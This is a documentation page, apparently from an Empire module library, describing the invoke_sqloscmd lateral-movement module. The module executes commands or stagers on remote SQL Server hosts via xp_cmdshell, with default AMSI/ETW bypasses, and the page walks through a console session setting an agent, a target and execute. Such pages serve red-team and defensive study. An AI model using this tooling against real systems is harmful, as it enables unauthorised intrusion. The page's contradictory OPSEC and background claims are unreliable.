Invoke-SQLOSCMD - Empire Module
This page contains detailed information about how to use the powershell/lateral_movement/invoke_sqloscmd Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-SQLOSCMD
Module: powershell/lateral_movement/invoke_sqloscmd
Source code [1]: empire/server/modules/powershell/lateral_movement/invoke_sqloscmd.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/invoke_sqloscmd.py
MITRE ATT&CK:
T1505
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes
The invoke_sqloscmd module executes a command or stager on remote hosts using xp_cmdshell.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the invoke_sqloscmd module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the invoke_sqloscmd module:
Agent
Agent to run module on.
Instance
Host[s] to execute the stager on, comma separated.
Additional Module Options
This is a list of additional options that are supported by the invoke_sqloscmd module:
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.
Command
Custom command to execute on remote hosts.
CredID
CredID from the store to use.
Listener
Listener to use.
Password
Password to use to execute command.
Proxy
Proxy to use for request (default, none, or other).
Default value: default.
ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.
UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.
UserName
[domain\]username to use to execute command.
Invoke_sqloscmd Example Usage
Here's an example of how to use the invoke_sqloscmd module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/invoke_sqloscmd
Author @nullbind
@0xbadjuju
Background True
Description Executes a command or stager on remote hosts using xp_cmdshell.
Language powershell
Name powershell/lateral_movement/invoke_sqloscmd
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1505
,Record Options-------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------|--------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------|--------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------|--------------------|----------|-------------------------------------|
| Command | | False | Custom command to execute on remote |
| | | | hosts. |
|------------|--------------------|----------|-------------------------------------|
| CredID | | False | CredID from the store to use. |
|------------|--------------------|----------|-------------------------------------|
| Instance | | True | Host[s] to execute the stager on, |
| | | | comma separated. |
|------------|--------------------|----------|-------------------------------------|
| Listener | | False | Listener to use. |
|------------|--------------------|----------|-------------------------------------|
| Password | | False | Password to use to execute command. |
|------------|--------------------|----------|-------------------------------------|
| Proxy | default | False | Proxy to use for request (default, |
| | | | none, or other). |
|------------|--------------------|----------|-------------------------------------|
| ProxyCreds | default | False | Proxy credentials |
| | | | ([domain\]username:password) to use |
| | | | for request (default, none, or |
| | | | other). |
|------------|--------------------|----------|-------------------------------------|
| UserAgent | default | False | User-agent string to use for the |
| | | | staging request (default, none, or |
| | | | other). |
|------------|--------------------|----------|-------------------------------------|
| UserName | | False | [domain\]username to use to execute |
| | | | command. |
'------------'--------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/lateral_movement/invoke_sqloscmd) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/invoke_sqloscmd) > set Instance value
[*] Set Instance to value
(Empire: usemodule/powershell/lateral_movement/invoke_sqloscmd) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/invoke_sqloscmd.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/invoke_sqloscmd.py
- http://attack.mitre.org/techniques/T1505
See Also
Check also the following modules related to this module:
- powershell/lateral_movement/invoke_psexec
- powershell/lateral_movement/invoke_psremoting
- powershell/lateral_movement/invoke_executemsbuild
- powershell/lateral_movement/invoke_dcom
- powershell/lateral_movement/invoke_portfwd
- powershell/lateral_movement/invoke_smbexec
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
- powershell/lateral_movement/invoke_sshcommand
- powershell/code_execution/invoke_metasploitpayload
- powershell/code_execution/invoke_ntsd
- powershell/code_execution/invoke_shellcodemsil
- powershell/code_execution/invoke_assembly
- powershell/code_execution/invoke_reflectivepeinjection
- powershell/code_execution/invoke_ironpython
- powershell/code_execution/invoke_clearscript
- powershell/code_execution/invoke_dllinjection
- powershell/code_execution/invoke_ironpython3
- powershell/code_execution/invoke_shellcode
- powershell/code_execution/invoke_ssharp
- powershell/code_execution/invoke_boolang
- powershell/exploitation/invoke_spoolsample
- powershell/credentials/invoke_kerberoast
- powershell/credentials/invoke_internal_monologue
- powershell/credentials/invoke_ntlmextract
- powershell/management/invoke_script
- powershell/management/invoke_sharpchisel
- powershell/management/invoke_socksproxy
- powershell/lateral_movement/jenkins_script_console
- powershell/lateral_movement/new_gpo_immediate_task
- powershell/lateral_movement/inveigh_relay
- python/lateral_movement/multi/ssh_launcher
- python/lateral_movement/multi/ssh_command
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.
